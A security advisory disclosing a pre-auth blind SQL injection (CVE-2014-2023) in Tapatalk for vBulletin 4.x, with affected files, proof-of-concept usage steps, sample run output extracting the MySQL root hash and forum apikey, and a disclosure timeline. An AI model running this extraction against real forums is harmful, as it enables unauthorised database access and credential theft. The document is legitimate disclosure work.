pub

Preliminary VulnNote

CVE-2014-2023 - Tapatalk for vbulletin 4.x - multiple blind sql injection (pre-auth)

Overview

date    :  10/12/2014   
cvss    :  7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N) base  
cwe     :  89   

vendor  :  Tapatalk Inc  
product :  Tapatalk for vBulletin 4.x   
versions affected:	<= 5.2.1 - latest (to date)
					5.2.1	(verified)
					4.9.0 	(verified)
					
exploitability :
			* remotely exploitable
			* NO authentication required
			* NO user interaction required
			* NO special configuration required (default settings)

Abstract

Tapatalk for vBulletin 4.x does not properly sanitize some xmlrpc calls for
unsubscribe_topic, unsubscribe_forum allowing unauthenticated users to
inject arbitrary SQL commands.

googledork: see PoC code

Details

vulnerable component: 
	./mobiquo/functions/unsubscribe_forum.php
	./mobiquo/functions/unsubscribe_topic.php
xmlrpc request is decoded, decoded attacker provided values are directly
being used in sql query.

Proof of Concept (PoC)

see https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2023


1) prerequisites
     vBulletin 4.x with Tapatalk for vBulletin 4.x installed
2) run PoC
	 edit PoC to match your TARGET (, optionally DEBUG=True)
	 (optionally) edit your query to extract specific database values
	 Note: PoC will try to detect tapatalk on that host
	 run PoC
	
by default extracts
* mysql root hash (in case vBulletin db user has permissions to do so)
* vbulletin db record fields (apikey) - perfectly chains with CVE-2014-2023

only limited by the vBulletin db_user access permissions


run:
[ i] Taptalk detected ...  'http://TARGET/mobiquo/mobiquo.php' ...  v.5.2.1  :) - OK
[   ] TAPATALK for vBulletin 4.x - SQLi
[--] Target: http://TARGET/forum.php
[ +] Attack - sqli
[ *] guess mysql user/pass
[    ] trying to guess length ...
. 
[  *] LENGTH = 0
[    ] trying to guess value  ...
[  *] SUCCESS!: query: select -1 from mysql.user where user='root' and password =''

[ *] guess apikey
[    ] trying to guess length ...
. . . . . . . . . 
[  *] LENGTH = 8
[    ] trying to guess value  ...
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
[  +] HIT! - [4]..
. . . . . . 
[  +] HIT! - 4[F]..
. 
[  +] HIT! - 4F[A]..
. . . . . . . . . . . . . . . . . . . . . . 
[  +] HIT! - 4FA[V]..
. . . 
[  +] HIT! - 4FAV[c]..
. . . . . . . . . . . . . . . . . . 
[  +] HIT! - 4FAVc[R]..
. . . . 
[  +] HIT! - 4FAVcR[D]..
. . . 
[  +] HIT! - 4FAVcRD[c]..
[  *] SUCCESS!: query: select -1 from setting where varname='apikey' and value ='4FAVcRDc'
4FAVcRDc
-- done --

Timeline

2014-01-14: initial vendor contact, no response
2014-02-24: vendor contact, no response
2014-10-13: public disclosure
2014-10-14: vendor response - acknowledged, fix in progress
2014-10-17: waiting for fix to become publicly available
2014-10-24: poc release

Contact

tintinweb - https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2023

(0x721427D8)